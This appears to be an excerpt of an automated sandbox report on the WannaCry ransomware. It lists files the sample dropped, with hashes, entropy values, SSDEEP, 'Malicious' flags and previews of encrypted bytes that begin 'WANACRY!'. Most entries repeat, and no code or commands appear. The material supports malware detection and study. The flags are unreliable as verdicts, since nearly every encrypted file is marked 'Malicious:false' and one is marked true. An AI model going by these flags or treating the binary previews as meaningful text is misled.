                                                                              Malicious:false
                                                                              Preview:WANACRY!.....+6k.-..Om..j.&.)ls.?\4p.Rfo....b.....9!.....5>Yd..#{.zWd:..6..:|......mw>..."..}..F$.....-.V....Y.P/z.K...w..uO/..l...X.#..V]D.t....egw,z.s.\.....D..T.P.sH.....M%d.j..B.\..AiG...D.@#W?'.r...:...p....n....G...R.O.@..3B..<.Y.....w...#X.O.G/..M.3=............~.^*..F..Z..zom..R..dV..76..H......\.%......3!...L.....D.bo.....V.3.d.K*..8....H3n....%........g>.~FK.66.`yb.G8.2[.yy....e...?.%;k.zn{.du..l......Dm=X.{...O...[..B..X.w......}..w..... .._.7a.....%..i.....a.`.0dg...,".....N..._.F..:[..y.]h....\>.*..<.%......w...Z.t.uz..x.?i..NLY.....:.g.5.x...B.#....t.3.x<..u.\8D.-.G...R._3....jR_Bf....[.<E"....*9'5.x~..)..#.`.D1..a.o...dRe%}.#.Zj...^1.....Cf...s......6.e...$.+..2....Un....B.V..po..|.9~........$.Q......5.i....(..."t.k.0O..>a.*...z..&.lX.m...u..`yF.P....q.....!.(.'w<..;.+z........tz3p.T.-y..{.../.C`.......n.........`.._...w.qZn..SXl...u...J... ...p!.#..aJ....00.(.Z.:-..h{..>>.......V..&Z..s....c'...!.`...4./...&'-....'....o.E.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4120
                                                                              Entropy (8bit):7.95100228844022
                                                                              Encrypted:false
                                                                              SSDEEP:96:oQNMFkTO4/LyvQEF6hi0h2DKvZgRPV2LPvdhgGXdBJDIQ/GBgUG7uChnS:5mkd/GvLMZ2WvZgGPgoRGB87JhS
                                                                              MD5:E46C09EF1AE16837B66211C2F758C138
                                                                              SHA1:B46BCE46AD77F195C8FD5213EC547F2F88E1C307
                                                                              SHA-256:C494D3F78C96E5F2837F0D1151C587C1F3157887EC346FC46678E7D9F906A568
                                                                              SHA-512:E88D46584C8E677EE2F492A48D044F5838B43F5E96FC375B79A32DB798B1B534C615B465CC8853A3970D8AE899386BF05357F7B89430BB976B7B77974A0A6A1A
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....+6k.-..Om..j.&.)ls.?\4p.Rfo....b.....9!.....5>Yd..#{.zWd:..6..:|......mw>..."..}..F$.....-.V....Y.P/z.K...w..uO/..l...X.#..V]D.t....egw,z.s.\.....D..T.P.sH.....M%d.j..B.\..AiG...D.@#W?'.r...:...p....n....G...R.O.@..3B..<.Y.....w...#X.O.G/..M.3=............~.^*..F..Z..zom..R..dV..76..H......\.%......3!...L.....D.bo.....V.3.d.K*..8....H3n....%........g>.~FK.66.`yb.G8.2[.yy....e...?.%;k.zn{.du..l......Dm=X.{...O...[..B..X.w......}..w..... .._.7a.....%..i.....a.`.0dg...,".....N..._.F..:[..y.]h....\>.*..<.%......w...Z.t.uz..x.?i..NLY.....:.g.5.x...B.#....t.3.x<..u.\8D.-.G...R._3....jR_Bf....[.<E"....*9'5.x~..)..#.`.D1..a.o...dRe%}.#.Zj...^1.....Cf...s......6.e...$.+..2....Un....B.V..po..|.9~........$.Q......5.i....(..."t.k.0O..>a.*...z..&.lX.m...u..`yF.P....q.....!.(.'w<..;.+z........tz3p.T.-y..{.../.C`.......n.........`.._...w.qZn..SXl...u...J... ...p!.#..aJ....00.(.Z.:-..h{..>>.......V..&Z..s....c'...!.`...4./...&'-....'....o.E.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):6056
                                                                              Entropy (8bit):7.970628602052222
                                                                              Encrypted:false
                                                                              SSDEEP:96:os07EozZyxJSifcAKKggacwt+VQR0rn2f12LGkHtrL4JPF4k8/JNshpfOPbNQLlI:hNoV2JVhXggxw4VQRAnY25keNsANUlxK
                                                                              MD5:5306B5B57DA8629B4113407669E8D8ED
                                                                              SHA1:980E69089A544AF80B84868D0C916303C9A175F8
                                                                              SHA-256:5CADB2E7AC66D2C72910758B93A546E4CEF71F4738FC01EA2AE93C6F77C391EF
                                                                              SHA-512:D0EA913C933FEE953DAED620532AED0D6646CBC19C82DA564CB4B5C8FD898945A6F9771771C5D1C2DB46CB5A6EE2CBC082CE46D8549D23494437B8B76B96B04B
                                                                              Malicious:false
                                                                              Preview:WANACRY!....e[+...ad..*.....!&k.. .qA.p.......B.T...#......-'.KG...I..?....NG.7..C...O...mA.M.?..5.o..s...../,S....:.Mp{...?5l".nG...A$#1[.O+"".u-.wp2......B.=.....6.4...&...7..N6...o.)J.D...~..v.9..Q#Rn."=lZ.R..1.T...T...2Ja6d/.ii.Fw....D>.&....."=..G.T................a.6.n.2.*+.i.,.@...}.?.(......U.r..a%...5...S..H..m...v...N.c....F..r..oeg..I....$]..i..HtJ}._....l....dH..5.oP.F[2.?.T`.......\ET.......W%..8.+.X^<.$.x.M..eW.... .o@.#.+.@.o.f..../.s8\>.-.US..x...@*.....m".._.....jF.>,4......V.]..(....X.....#..X..&)..RCr.5x..K-[.T..vufR9...m...X....Y.'......j.%...........c.;)..:'!.O4*F=..E.s...oEW..t.j~a.D]{.@.......><.y...?..Z-.~..6Z.0.s.....!q..#.xD&SU.k2....W..|0...3..L..q.5..E2:....%.8.j.....Ty<|.h...f.]...+.:..._$.6.......U+....o3..j...&6@..4........78...~zwx}..3.......1.ZU8.Z.$...a.....xs..M........"~.......:..&...J....F..h......g*..yn_...l$%[.#A*.<f>}$9..,.~..;..o_Y.>.....e .....U..p.E.s.d.Le....:.|....jm{tr..ch...&.w..k.,..}n.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):6056
                                                                              Entropy (8bit):7.970628602052222
                                                                              Encrypted:false
                                                                              SSDEEP:96:os07EozZyxJSifcAKKggacwt+VQR0rn2f12LGkHtrL4JPF4k8/JNshpfOPbNQLlI:hNoV2JVhXggxw4VQRAnY25keNsANUlxK
                                                                              MD5:5306B5B57DA8629B4113407669E8D8ED
                                                                              SHA1:980E69089A544AF80B84868D0C916303C9A175F8
                                                                              SHA-256:5CADB2E7AC66D2C72910758B93A546E4CEF71F4738FC01EA2AE93C6F77C391EF
                                                                              SHA-512:D0EA913C933FEE953DAED620532AED0D6646CBC19C82DA564CB4B5C8FD898945A6F9771771C5D1C2DB46CB5A6EE2CBC082CE46D8549D23494437B8B76B96B04B
                                                                              Malicious:false
                                                                              Preview:WANACRY!....e[+...ad..*.....!&k.. .qA.p.......B.T...#......-'.KG...I..?....NG.7..C...O...mA.M.?..5.o..s...../,S....:.Mp{...?5l".nG...A$#1[.O+"".u-.wp2......B.=.....6.4...&...7..N6...o.)J.D...~..v.9..Q#Rn."=lZ.R..1.T...T...2Ja6d/.ii.Fw....D>.&....."=..G.T................a.6.n.2.*+.i.,.@...}.?.(......U.r..a%...5...S..H..m...v...N.c....F..r..oeg..I....$]..i..HtJ}._....l....dH..5.oP.F[2.?.T`.......\ET.......W%..8.+.X^<.$.x.M..eW.... .o@.#.+.@.o.f..../.s8\>.-.US..x...@*.....m".._.....jF.>,4......V.]..(....X.....#..X..&)..RCr.5x..K-[.T..vufR9...m...X....Y.'......j.%...........c.;)..:'!.O4*F=..E.s...oEW..t.j~a.D]{.@.......><.y...?..Z-.~..6Z.0.s.....!q..#.xD&SU.k2....W..|0...3..L..q.5..E2:....%.8.j.....Ty<|.h...f.]...+.:..._$.6.......U+....o3..j...&6@..4........78...~zwx}..3.......1.ZU8.Z.$...a.....xs..M........"~.......:..&...J....F..h......g*..yn_...l$%[.#A*.<f>}$9..,.~..;..o_Y.>.....e .....U..p.E.s.d.Le....:.|....jm{tr..ch...&.w..k.,..}n.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):10344
                                                                              Entropy (8bit):7.980912314761978
                                                                              Encrypted:false
                                                                              SSDEEP:192:KsBHOokBepcJrre1rks0MIo/iyeW6EotgnS2SIF3d5W+qygEDtuy+9c+KrJQItG:5BHOowgcFe16M55lcgSCF3dLqwU/dNH
                                                                              MD5:397F2EDFD856141F1261B9394F9A0A64
                                                                              SHA1:18A1714A056AFC8B101DCEB4BC59F6143E1D648E
                                                                              SHA-256:59602B797712F48529B1BE53D094E146AF4D2092CE46AE06B4BCEFAC75945B12
                                                                              SHA-512:7AFF5B6D897854F758BF6C0C9DA1D82E35A67781771FB8863F793AFDD3E12C0F81EA7A2922040931B0317E7C3DAD5ED6F32BE6481C21C3D7B758B88C6A4EA6FF
                                                                              Malicious:false
                                                                              Preview:WANACRY!....8....SH..x..#..@.%6.`...0...*C...n.}K2%...v..E7=..C.Ok...I.u.....R$Y[.~.......zB..Y....7..b...<..r...*=..l...".6.....R5]....h...z...sU`.S....8......9.n.)..bZ...".~...;cs.BM.K...vT..Lg.5......&...j...%..m.e~.k.]..\.42...k.....k5.g.;.+W.a$?.0.&....P'......&...2U../[..6M .U!..h..>...a.8.....&J.~....q%..^........XC.V|...K..RB..'e$.....w..N.|w..b....f......(..~y.Ljy.......L.....X.....J.yB........#....&ZyU...y7...k.....F....t.B...!..H.....@........F....|.@...N.{R..r...S>w.KB..KE4`.u......+.........oj..%.[...q.#.@.x.j.x...$;...../U...V.X$o...V.W..|O.H.UE.....1s.D.m.......-n.P.6....b.s{.T.F!.}....;.g9...^.M......*.}...Qw.E..9....j;^hQ..@..pF14..W.W`Z.xz.;.z.. lC.rw.&..a..tM...&.d...[5j...........X....t..!....."!..C..M.A.x.X...,..c....x..t..i~.1Z-.....f#..C...+3.9..c.3fu..)/I.}..v......~U.Y......\}1....y..x.....wo.....5y...)7......0.u..hR.x.oB6...N...EHn.D.......i.#......t...,....7u.D.&.L.`..J.y._..{...rc-sl.....Lj....4...S....;.=s
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):10344
                                                                              Entropy (8bit):7.980912314761978
                                                                              Encrypted:false
                                                                              SSDEEP:192:KsBHOokBepcJrre1rks0MIo/iyeW6EotgnS2SIF3d5W+qygEDtuy+9c+KrJQItG:5BHOowgcFe16M55lcgSCF3dLqwU/dNH
                                                                              MD5:397F2EDFD856141F1261B9394F9A0A64
                                                                              SHA1:18A1714A056AFC8B101DCEB4BC59F6143E1D648E
                                                                              SHA-256:59602B797712F48529B1BE53D094E146AF4D2092CE46AE06B4BCEFAC75945B12
                                                                              SHA-512:7AFF5B6D897854F758BF6C0C9DA1D82E35A67781771FB8863F793AFDD3E12C0F81EA7A2922040931B0317E7C3DAD5ED6F32BE6481C21C3D7B758B88C6A4EA6FF
                                                                              Malicious:false
                                                                              Preview:WANACRY!....8....SH..x..#..@.%6.`...0...*C...n.}K2%...v..E7=..C.Ok...I.u.....R$Y[.~.......zB..Y....7..b...<..r...*=..l...".6.....R5]....h...z...sU`.S....8......9.n.)..bZ...".~...;cs.BM.K...vT..Lg.5......&...j...%..m.e~.k.]..\.42...k.....k5.g.;.+W.a$?.0.&....P'......&...2U../[..6M .U!..h..>...a.8.....&J.~....q%..^........XC.V|...K..RB..'e$.....w..N.|w..b....f......(..~y.Ljy.......L.....X.....J.yB........#....&ZyU...y7...k.....F....t.B...!..H.....@........F....|.@...N.{R..r...S>w.KB..KE4`.u......+.........oj..%.[...q.#.@.x.j.x...$;...../U...V.X$o...V.W..|O.H.UE.....1s.D.m.......-n.P.6....b.s{.T.F!.}....;.g9...^.M......*.}...Qw.E..9....j;^hQ..@..pF14..W.W`Z.xz.;.z.. lC.rw.&..a..tM...&.d...[5j...........X....t..!....."!..C..M.A.x.X...,..c....x..t..i~.1Z-.....f#..C...+3.9..c.3fu..)/I.}..v......~U.Y......\}1....y..x.....wo.....5y...)7......0.u..hR.x.oB6...N...EHn.D.......i.#......t...,....7u.D.&.L.`..J.y._..{...rc-sl.....Lj....4...S....;.=s
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7240
                                                                              Entropy (8bit):7.972291571994038
                                                                              Encrypted:false
                                                                              SSDEEP:96:oA8Cfxy+CuKaS0vduIm3H5wIhnImCoPl2MyBwRDbcFmUvhXKSKtdictDdHmSuDxY:p8mxyXuHzvd7m/IE2TKRUmcBQi6t3QxY
                                                                              MD5:6A9BBBAE98583180780D6FBB95B52405
                                                                              SHA1:223F2AFC31A1CC425F4CA071B8DBE0B5CF43A409
                                                                              SHA-256:31EF187EB4B6A3DA0DA0A382342C10DA21791CE77AC415DC8B4D4A6716F7B412
                                                                              SHA-512:59F440DA16F2E621EF41F56ECA4A1C769CDAFFE1AFEFAE72358966215FB55B0F876C9B1E634AFB134ADE48121B247C1595D348EE6005FE67C5F415D7F91707F5
                                                                              Malicious:false
                                                                              Preview:WANACRY!......Q.&.'...4.G..c..W9oI6."~U..w.xC..*...'..G.zQ....2.....=rt[.|.6...)Q:">..O9..I0.@.....P..Jk.l.|S.R....D..2.H..On9XX.G...e..6zX....Q...Y@.....f\%.e....G....+.:../.....9..v.#;..i.b...jE. ..4....|...&v....L...D.coo.....#E<w.sbb.u...e.......:.O.".NZ..?.....+.......B75.....X-.....[u..4b-Z...`...~....)I^.7.;.m....m.)yU.....iK.V.IV*H..A..g.A.=...oB0.x....o..1T}9......m.U.@N.n;I..l.U...1.....3z..cru...$J.....(...#.a8)$.T..e.v.u....P.....[.S...G..[....}+.&...n.z6$y/T..@...Y5....g.V..Y.D.:..O.hP.4wFD.p.OV.."..vMk...L..N...S..k..S.J....+...L.PW.5.H.Vn..r...b....I>..*...h..t...M.L..&M..k.: ....^X..iSy.*.D.K...].z.........mZ..AN(...q....*.P..&.s;..Q.@...N.qJ=....s..7.@..............w..r.6.+...5.p..2...{Y...TB\-.1..yl..TZQ..p...........x.......fe./.|*.......w..z.......w,.....z..k.s..W\{2..a...b.c.{.mS........Z....\...~R..A.k.V.`..Lu.k0.p!...y...f...8.......3..D"..nr...v`...b..u.....a...........k)....#.q+.`...p4.Y.......#...>.....9.z...t...H6.R
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):7240
                                                                              Entropy (8bit):7.972291571994038
                                                                              Encrypted:false
                                                                              SSDEEP:96:oA8Cfxy+CuKaS0vduIm3H5wIhnImCoPl2MyBwRDbcFmUvhXKSKtdictDdHmSuDxY:p8mxyXuHzvd7m/IE2TKRUmcBQi6t3QxY
                                                                              MD5:6A9BBBAE98583180780D6FBB95B52405
                                                                              SHA1:223F2AFC31A1CC425F4CA071B8DBE0B5CF43A409
                                                                              SHA-256:31EF187EB4B6A3DA0DA0A382342C10DA21791CE77AC415DC8B4D4A6716F7B412
                                                                              SHA-512:59F440DA16F2E621EF41F56ECA4A1C769CDAFFE1AFEFAE72358966215FB55B0F876C9B1E634AFB134ADE48121B247C1595D348EE6005FE67C5F415D7F91707F5
                                                                              Malicious:false
                                                                              Preview:WANACRY!......Q.&.'...4.G..c..W9oI6."~U..w.xC..*...'..G.zQ....2.....=rt[.|.6...)Q:">..O9..I0.@.....P..Jk.l.|S.R....D..2.H..On9XX.G...e..6zX....Q...Y@.....f\%.e....G....+.:../.....9..v.#;..i.b...jE. ..4....|...&v....L...D.coo.....#E<w.sbb.u...e.......:.O.".NZ..?.....+.......B75.....X-.....[u..4b-Z...`...~....)I^.7.;.m....m.)yU.....iK.V.IV*H..A..g.A.=...oB0.x....o..1T}9......m.U.@N.n;I..l.U...1.....3z..cru...$J.....(...#.a8)$.T..e.v.u....P.....[.S...G..[....}+.&...n.z6$y/T..@...Y5....g.V..Y.D.:..O.hP.4wFD.p.OV.."..vMk...L..N...S..k..S.J....+...L.PW.5.H.Vn..r...b....I>..*...h..t...M.L..&M..k.: ....^X..iSy.*.D.K...].z.........mZ..AN(...q....*.P..&.s;..Q.@...N.qJ=....s..7.@..............w..r.6.+...5.p..2...{Y...TB\-.1..yl..TZQ..p...........x.......fe./.|*.......w..z.......w,.....z..k.s..W\{2..a...b.c.{.mS........Z....\...~R..A.k.V.`..Lu.k0.p!...y...f...8.......3..D"..nr...v`...b..u.....a...........k)....#.q+.`...p4.Y.......#...>.....9.z...t...H6.R
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):25624
                                                                              Entropy (8bit):7.99115210425878
                                                                              Encrypted:true
                                                                              SSDEEP:768:ihHlnYaZnKBFaiEgoq1ctctntEmHMP6k7G:SFYaZnNDq1ctcfLHQ68G
                                                                              MD5:8E4EE8C696AECDEDEC13ECE1050E9E3E
                                                                              SHA1:F2C65BB7D5011D608A63E0A20D2A954878498FCA
                                                                              SHA-256:5B5CFBD800733F32AE2B342E9608C83A504C271C465B6E7C00597677D44531C9
                                                                              SHA-512:5F3900F63544D813F25E1124C1B12EA6150CD90A1476ABAB96AF4A0163A5F63BC837C6EE1F4D888C3E757FFF8A4608240CA677E8126086BEFC31393BFF7AA259
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....x.O.-.fy2.U...|..D.vP...sdC.../~0...5&..\...#......^.c.>u{.....c.z..w.....,h.... l2g&..e..\.<'....0J..|..7..`....j.j.8N...;3;.GAXH......U...{TP.%.\.....3.<.v.*.!...X....]/.7%G...Ex.W.D.o......\..'..?..mAl.:13.....g..1..t.4...V+qU_'....s..>..r.....b......5.......,=... .x.P.T..`z.1..c.q.`..z./l....o..V........$..z#.....:XkW.X........".-[....U.|..P)U,.x..Y...Ln..K..6.f |..Xew.....w.HQ.......-...[..U.Tk*..Ky!...EB........Ha..y[j.@...I.6A:xRB..........\..3..yc.#...;.mz...a..N.T..yk....z.{......H2.5e..g....K..4..;..5.Iu.M.g}....h...T.v7?......=........gL.XZkmb.bV;."H'.=wZ..PZ._.|.#.)~..6.*..5.w..scRn........Uo^..Z....l~..+..::./b.i....t7..x.\).[f$YW..b.sgD.f...]..}.<..dRC;x*.f.k.M4M.{.h2.c!.-e.LA.bq*n?.`.0..e#m.YyyP........R.>.>.....Z.W..TF:e\..O..khA....D./.F~+....I.`.z.."..........d....*...HG.......a.../.=..|.0..N.dC!.)...{.....~.[s.I..y..-......*.DDa.c.....z.s..!7.~.x..w.}L...u-.18.=..........v..[.......Hr............#).......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):25624
                                                                              Entropy (8bit):7.99115210425878
                                                                              Encrypted:true
                                                                              SSDEEP:768:ihHlnYaZnKBFaiEgoq1ctctntEmHMP6k7G:SFYaZnNDq1ctcfLHQ68G
                                                                              MD5:8E4EE8C696AECDEDEC13ECE1050E9E3E
                                                                              SHA1:F2C65BB7D5011D608A63E0A20D2A954878498FCA
                                                                              SHA-256:5B5CFBD800733F32AE2B342E9608C83A504C271C465B6E7C00597677D44531C9
                                                                              SHA-512:5F3900F63544D813F25E1124C1B12EA6150CD90A1476ABAB96AF4A0163A5F63BC837C6EE1F4D888C3E757FFF8A4608240CA677E8126086BEFC31393BFF7AA259
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....x.O.-.fy2.U...|..D.vP...sdC.../~0...5&..\...#......^.c.>u{.....c.z..w.....,h.... l2g&..e..\.<'....0J..|..7..`....j.j.8N...;3;.GAXH......U...{TP.%.\.....3.<.v.*.!...X....]/.7%G...Ex.W.D.o......\..'..?..mAl.:13.....g..1..t.4...V+qU_'....s..>..r.....b......5.......,=... .x.P.T..`z.1..c.q.`..z./l....o..V........$..z#.....:XkW.X........".-[....U.|..P)U,.x..Y...Ln..K..6.f |..Xew.....w.HQ.......-...[..U.Tk*..Ky!...EB........Ha..y[j.@...I.6A:xRB..........\..3..yc.#...;.mz...a..N.T..yk....z.{......H2.5e..g....K..4..;..5.Iu.M.g}....h...T.v7?......=........gL.XZkmb.bV;."H'.=wZ..PZ._.|.#.)~..6.*..5.w..scRn........Uo^..Z....l~..+..::./b.i....t7..x.\).[f$YW..b.sgD.f...]..}.<..dRC;x*.f.k.M4M.{.h2.c!.-e.LA.bq*n?.`.0..e#m.YyyP........R.>.>.....Z.W..TF:e\..O..khA....D./.F~+....I.`.z.."..........d....*...HG.......a.../.=..|.0..N.dC!.)...{.....~.[s.I..y..-......*.DDa.c.....z.s..!7.~.x..w.}L...u-.18.=..........v..[.......Hr............#).......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1784
                                                                              Entropy (8bit):7.894838013728199
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkB6GG0UGpQQ+1lEi9mKhTolkkMWstj0Cl6qIYj:oB65N0KEejMKkMtLIq
                                                                              MD5:EE18C15937208A6E791D09F52F33A90D
                                                                              SHA1:E5B9F7369ECC8D73ACD378157F92E41354345D01
                                                                              SHA-256:C47D0A63746CA02D28C0C4DD187D26E5234F7DF2FE78088EFEE85A4549ACFC7C
                                                                              SHA-512:4CDC0715E45F5FFCD018654A54BCEE685524D176B0CF62DD62D2E82FBF7298403BB892A6980FF1C6EEDF00C0493C17BFC2C914E75467EEA09D1CEE0EC5F3A906
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....p....M_h.P.#m.U.#.[...\Q6.....q.7.n@.F..b..../...H....U@..U&z}..)Q.8.v....7.....l6.8'_.[.\_..2..0..i.....@9.c.W..V....#U3.D.=.'X..C.LI....:.[lM<1..(......QpY..J4..^.y..v.u;.8...%./.E...E9....)..Z..Te..1...#...5.D..X.."Q...t.L.....t.H.+....A................8.6.Wm..w.G.......GO....JR.'.djI..@.D..A....E...y....P.aV..[lp...VT....0.y=v..{.Q...........d...EF)..L.0..%9i..@.e.....7R-rtp\..0D...]."...Y(f...@W....jH.PX..JGR!..Y7.8rF..1...]+....X.....J..S....F0....?.".t*.s..N.F..kl[....+.=I.}.L..8.+._i.R..........=5...........y#p.X..%....Q...R........#...~[..h6.X..\....."..T......................\.:N.8..D...[.1dT.Mo3...?.)a)...\...M_...X.1...!...|!k{.$...N.R.J.........v`9...7.....a..].QS*.......J.......j$Z.....ab....l.... .O!.]k..q....[...k...L...UO.z.+.n.Z .::~...tri..\...........7Z.V.....9.)'...a........y.u.U.....v. ...8 ..(oI$l.}.....<D...k`vs..........#.../..~..S+.0%......U...*A..<.....$KG.w....u KBO71...{A1.Jhf9.....r.f=%.I.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1784
                                                                              Entropy (8bit):7.894838013728199
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkB6GG0UGpQQ+1lEi9mKhTolkkMWstj0Cl6qIYj:oB65N0KEejMKkMtLIq
                                                                              MD5:EE18C15937208A6E791D09F52F33A90D
                                                                              SHA1:E5B9F7369ECC8D73ACD378157F92E41354345D01
                                                                              SHA-256:C47D0A63746CA02D28C0C4DD187D26E5234F7DF2FE78088EFEE85A4549ACFC7C
                                                                              SHA-512:4CDC0715E45F5FFCD018654A54BCEE685524D176B0CF62DD62D2E82FBF7298403BB892A6980FF1C6EEDF00C0493C17BFC2C914E75467EEA09D1CEE0EC5F3A906
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....p....M_h.P.#m.U.#.[...\Q6.....q.7.n@.F..b..../...H....U@..U&z}..)Q.8.v....7.....l6.8'_.[.\_..2..0..i.....@9.c.W..V....#U3.D.=.'X..C.LI....:.[lM<1..(......QpY..J4..^.y..v.u;.8...%./.E...E9....)..Z..Te..1...#...5.D..X.."Q...t.L.....t.H.+....A................8.6.Wm..w.G.......GO....JR.'.djI..@.D..A....E...y....P.aV..[lp...VT....0.y=v..{.Q...........d...EF)..L.0..%9i..@.e.....7R-rtp\..0D...]."...Y(f...@W....jH.PX..JGR!..Y7.8rF..1...]+....X.....J..S....F0....?.".t*.s..N.F..kl[....+.=I.}.L..8.+._i.R..........=5...........y#p.X..%....Q...R........#...~[..h6.X..\....."..T......................\.:N.8..D...[.1dT.Mo3...?.)a)...\...M_...X.1...!...|!k{.$...N.R.J.........v`9...7.....a..].QS*.......J.......j$Z.....ab....l.... .O!.]k..q....[...k...L...UO.z.+.n.Z .::~...tri..\...........7Z.V.....9.)'...a........y.u.U.....v. ...8 ..(oI$l.}.....<D...k`vs..........#.../..~..S+.0%......U...*A..<.....$KG.w....u KBO71...{A1.Jhf9.....r.f=%.I.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2696
                                                                              Entropy (8bit):7.9301118336698755
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkggjGjax8+s7rGKn3lr38DdEMTPzF/Ky1wOv6YlW3qo9N7cvH49vBXQepeNzGK+:o+OaLrzn3lj8xXPF/KyyOvNYGPwv58J6
                                                                              MD5:3BB457473FFA23F953502D4AB1CE42DF
                                                                              SHA1:652B3CEFE42D2172D1964F38C920F93832DED0B1
                                                                              SHA-256:83958C63DF341D70CA1230316FAC4B2E7F076F14E29B7E28B95339221587DA75
                                                                              SHA-512:0C78D1CF98F2081C2A74F1BC58BD51990B7AEB9A91E4AE4FAACCE25D6BC036AF2CF354771FEDE0AD19F92F41517017317C09B9D6C3E7EFFD8DA15DB82286AF29
                                                                              Malicious:false
                                                                              Preview:WANACRY!....DC@."...............1....Nt@....j.....J.,...G%..vi[5....!.`.=tUr..mA....#..sj...{8.^7.1...._.DM.l..{.6......`....%.0d...U..Td.U..J.PaL.e.V.!l.......4P.sg?..#......,..7....H.A...2..........l.H...........R.3..z|#...!.n..:..[.....}Z.{`.D .4A.!b.....m.......<..K...f.......a\.B` (~.}.(".r..S....{...3....n....T....Q..Y.($z.7.+DU..........K-"&...a.....8..%#.P.-.\.hbFo_|._..9.)#....*....^..Go..'@.f6>+...>.....E#....L......qRJ...]Lt.:g...../..;.\.P.(x.X^.{.....s.S...=&..b.}..9C...L....dl.....Eb..'...In..{x..s..47.-.....u..p(.WV.[...pqU..._o....iZ...7.8......*.....m....$.C..`.ab.<..G...8..........m.O.4._..^0..........+.."=......sz...f<.*..%.c(..VQn.x...o...w.?V..q.....g..(...\]..T.}I...i.$..A.e...@.l..%....j.[ ........L.34...VrFD1]8u}JZ.n<M.GE...>?...k.=o.18..!...Q.........B......"y....=.l..%...,.i;..\.M..5N/.b..C.tA.....|.......J....f.*..[$..{e.x.Ph..&..........T.~.#Qp.'.yn......o..H.N.+o..g.?.W.>.k.[..6...r.n..H..=.g:../.^F5g.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2696
                                                                              Entropy (8bit):7.9301118336698755
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkggjGjax8+s7rGKn3lr38DdEMTPzF/Ky1wOv6YlW3qo9N7cvH49vBXQepeNzGK+:o+OaLrzn3lj8xXPF/KyyOvNYGPwv58J6
                                                                              MD5:3BB457473FFA23F953502D4AB1CE42DF
                                                                              SHA1:652B3CEFE42D2172D1964F38C920F93832DED0B1
                                                                              SHA-256:83958C63DF341D70CA1230316FAC4B2E7F076F14E29B7E28B95339221587DA75
                                                                              SHA-512:0C78D1CF98F2081C2A74F1BC58BD51990B7AEB9A91E4AE4FAACCE25D6BC036AF2CF354771FEDE0AD19F92F41517017317C09B9D6C3E7EFFD8DA15DB82286AF29
                                                                              Malicious:false
                                                                              Preview:WANACRY!....DC@."...............1....Nt@....j.....J.,...G%..vi[5....!.`.=tUr..mA....#..sj...{8.^7.1...._.DM.l..{.6......`....%.0d...U..Td.U..J.PaL.e.V.!l.......4P.sg?..#......,..7....H.A...2..........l.H...........R.3..z|#...!.n..:..[.....}Z.{`.D .4A.!b.....m.......<..K...f.......a\.B` (~.}.(".r..S....{...3....n....T....Q..Y.($z.7.+DU..........K-"&...a.....8..%#.P.-.\.hbFo_|._..9.)#....*....^..Go..'@.f6>+...>.....E#....L......qRJ...]Lt.:g...../..;.\.P.(x.X^.{.....s.S...=&..b.}..9C...L....dl.....Eb..'...In..{x..s..47.-.....u..p(.WV.[...pqU..._o....iZ...7.8......*.....m....$.C..`.ab.<..G...8..........m.O.4._..^0..........+.."=......sz...f<.*..%.c(..VQn.x...o...w.?V..q.....g..(...\]..T.}I...i.$..A.e...@.l..%....j.[ ........L.34...VrFD1]8u}JZ.n<M.GE...>?...k.=o.18..!...Q.........B......"y....=.l..%...,.i;..\.M..5N/.b..C.tA.....|.......J....f.*..[$..{e.x.Ph..&..........T.~.#Qp.'.yn......o..H.N.+o..g.?.W.>.k.[..6...r.n..H..=.g:../.^F5g.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4072
                                                                              Entropy (8bit):7.953705015145272
                                                                              Encrypted:false
                                                                              SSDEEP:96:o4V78/Y/awdF/4gw4YqLhJJFGUEPMusHK:HVy7yaOL3Fn9HK
                                                                              MD5:D6D85BD9C11CB017334E04F45982A180
                                                                              SHA1:3CF2C3A13AE0C27A1ACC4FA6561C1506E2C3258B
                                                                              SHA-256:4019D20C1E3D1D2BFB4D18C6C31FCD6F75E3D28DBFBD54BD036223C3E0374DF5
                                                                              SHA-512:569F69A8C3BA77DC5E0570F96C7A607030EB733AE32979CBB6F5AA6BA6DCBB01332F8A71BF53AEA50ED4DF8C5584EB03C8C58E1F1218CB0008B568206C966571
                                                                              Malicious:false
